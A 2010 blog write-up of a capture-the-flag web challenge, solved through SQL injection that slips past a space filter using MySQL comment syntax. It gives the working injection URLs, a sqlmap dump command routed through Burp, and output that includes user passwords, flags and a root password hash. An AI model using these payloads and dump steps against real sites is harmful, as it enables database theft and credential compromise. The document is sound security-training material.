Sunday, August 8, 2010

[smpctf] challenge #12 writeup (web-2)

The last month I have a nice time playing the smpctf CTF, you can view all the writeups here.

After connecting to the web page, we spotted an html comment that gives a clue of what was happening :).
So, with this tip, we can infer that the webpage expects a parameter called “id”, let’s give it a try
http://66.225.157.70:8009/level2/?id=1

With the previous request, it gives a valid message with a username. After that, we started to try different SQL injection vectors, but we were unsuccessful. The good thing is that the different error messages that were shown helped us to focus on the correct direction.

Finally, we obtain an interesting finding: the server filtered all the spaces character ‘ ‘, so we need to make an injection without using spaces (0x20).

A quick look on an amazing post about evading tricky MySQL filters (here), help us to find the proper MySQL syntax to bypass the server filter.

After some tries, we found a valid injection:
http://66.225.157.70:8009/level2/?pass=asdfa&id=id/**/and/**/1=1%23/*  => TRUE
http://66.225.157.70:8009/level2/?pass=asdfa&id=id/**/and/**/1=0%23/* => FALSE

After that, we used the excellent SQL Injection tool sqlmap (thanks Bernardo xD) in order to obtain a full dump of the database. The only problem is that the tool will use spaces on their SQL queries, so we need to find a way to automatically substitute these non-valid characters.

Finally I launch the Burp proxy, that have a cool feature called “match and replace”, so what I did was replace all the spaces with the string /**/ (MySQL comment). Lazy, but time-efficient ;p.

alex@localhost> python sqlmap.py  -u 'http://66.225.157.70:8009/level2/?pass=asdfa&id=id' -p id --proxy=http://192.168.0.2:8080 --postfix='%23' --string=magik --current-db -T users -D level1 –dump

In order to make the previous command to work, we need to fool sqlmap on the first 3 queries: The tool test if the URL is stable (looking for the string ‘magik’), but it is not returned on the normal response (without injection). So, we changed these queries with burp in order to return the expected string and after that the injection was flawless.

After waiting some minutes we obtained the cookie that allow us to level up :).
+------------+----+---------------+-----------------+
| flag | id | name | pass |
+------------+----+---------------+-----------------+
| iR0ck | 1 | magik | newPass2 |
| HaHa | 2 | redsand | blaISAGHEYhorse |
| lolFLAGlol | 3 | cookieMonster | 50c43871 |
+------------+----+---------------+-----------------+


Submitting the flag lolFLAGlol will allow to solve this challenge, and earn some points :)


As an interesting note, I run sqlmap in order to obtain more info the MySQL server, and this is the info that I obtained. Yep, the database user was DBA, and we obtained a nice hash to be cracked on our spared time xD.

current database:    'level1'
banner:    '5.0.84'


current user is DBA:    'True'


available databases [3]:
[*] information_schema
[*] level1
[*] mysql


current user:    'root@localhost'


current database:    'level1'


current user is DBA:    'True'


database management system users [3]:
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'root'@'slackware2-web-smp'


database management system users password hashes:
[*] root [1]:
    password hash: *E811D7768F080444F8D9ED913EEC8200FAD3C4FE
banner:    '5.0.84'


Database: level1
Table: users
[3 entries]
+------------+----+---------------+-----------------+
| flag       | id | name          | pass            |
+------------+----+---------------+-----------------+
| iR0ck      | 1  | magik         | newPass2        |
| HaHa       | 2  | redsand       | blaISAGHEYhorse |
| lolFLAGlol | 3  | cookieMonster | 50c43871        |
+------------+----+---------------+-----------------+